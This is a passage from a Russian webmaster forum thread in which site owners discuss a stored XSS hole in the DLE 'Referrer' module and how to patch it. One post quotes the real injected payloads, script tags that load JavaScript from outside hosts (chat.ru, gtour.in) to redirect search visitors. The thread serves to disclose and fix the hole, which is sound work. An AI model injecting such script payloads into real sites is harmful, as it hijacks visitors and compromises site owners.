- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня сломали один сайт, узнал это благодаря Яндексу, который любезно повесил табличку "опасно" рядом с моим сайтом. Проверил все что можно. А оказалось, решение было на поверхности.
Итак, взломать можно любой сайт на DLE, где стоит модуль Referrer (Переходы).
Ответ нашел в гугле:
Посмотрите в корлонке слева. Там есть запись "Google: rune". На самом деле ее код таков:
<strong>Google</strong></a>: <a href="/">rune<script src=http://m9cp.chat.ru/c.js></script></a>
Как можно заметить тут подключается "левый" JS, выполняемый в контексте сайта.
Тоже самое касается и "Google: pcgames":
<strong>Google</strong></a>: <a href="/">pcgames<script src=http://gtour.in/m.js></script></a>
Суть скрипта в том, что он анализирует реффер. Если реффер поисковая система, то идет перенаправление на нужный сайт с сохранением запроса.
Мораль сей басни такова, что нужно весь пользовательский ввод выводить через htmlspecialchars.
Что делать, я думаю вы поняли сами - срочно снимать модуль со своих сайтов.
PS: возможно вышел фикс модуля, не проверял
Уже почти 3 месяца как вышел.
http://getdle.org.ru/dle/modules/146-modul-perehody-89-final-release.html
Нефига неработает эта баг фикса. У меня таже проблема, посавил ее толку 0.
Что делать, я думаю вы поняли сами - срочно снимать модуль со своих сайтов.
Фикс вышел. А так дырка довольно интересная. Шикарная, я бы сказал. XSS в чистом виде.
Блин народ! Кто разбирается в PHP(я) уже давно(сразу как появилась проблема) ее решили... там только три строчки добавить надо и все!
Значит, так:
Фиксим дыру...
Идем в файл engine/modules/referer.php и там перед
ставим
Затем ищем
и после вставляем
далее идем чуть ниже и ищем
if (!$request) {$request = urldecode($http_referer);
после вставляем
Сохраняем файл и радуемся жизни!
Самое интересное в том что данная проблема у тех у кого стоит последняя версия этого модуля 8.9. У тех у кого более ранняя версия притензии вроде бы нет ))
RoMaN444Ik, Спасибо. Как раз то что надо. Сейчас попробую поставить. Если все будет ок - я тебя расцелую :)
_Vorobey_ добавил 02.08.2011 в 15:11
Хм, первый переход: В Блоке ссылок видим вот что
В Админке просто bees. Ошибки не в Блоке не в Админке нет. Вроде бы все окей. По поводу <script> так и должно быть? Или я своими кривыми лапами что то не так сделал. Возможно, в блоке ссылок, сам переход должен отображаться как в Админке? Т.е. просто bees.
Блин народ! Кто разбирается в PHP(я) уже давно(сразу как появилась проблема) ее решили... там только три строчки добавить надо и все!
Значит, так:
Фиксим дыру...
Идем в файл engine/modules/referer.php и там перед
ставим
Затем ищем
и после вставляем
далее идем чуть ниже и ищем
if (!$request) {$request = urldecode($http_referer);
после вставляем
Сохраняем файл и радуемся жизни!
Поставил, теперь запросы идут з ГУГЛА такого типа: downloads3Cscript20src=http:toyotapprugogogojs3E3C2Fscr - то-есть он уже скриптом не считаеться?
Да что вы херней страдаете?
Заходим на оф. сайт скрипта и качаем последнюю версию.
Уже 3 месяца, как известно о проблеме и её решении.
Да что вы херней страдаете?
Заходим на оф. сайт скрипта и качаем последнюю версию.
Уже 3 месяца, как известно о проблеме и её решении.
Вот именно что з последней версией XSS и пришло ко всем в гости, мне их решения не помогло, всеравно приходили ссылки з скриптом в адресе, вот данный метод в этом топике мне помог вроде.... Но всеравно приходят ссылки, тока без действующого скрипта....
О недостаточной фильтрации уже очень давно известно.
А вобще хочу сказать, что все же дырки мы сами себе лепим, устанавливая левые модули и левые хаки. К тому же, некоторые еще и деньги платят за модуль с дыркой. ДЛЕ и так вся в дырах, а тут еще и в модах с хаками.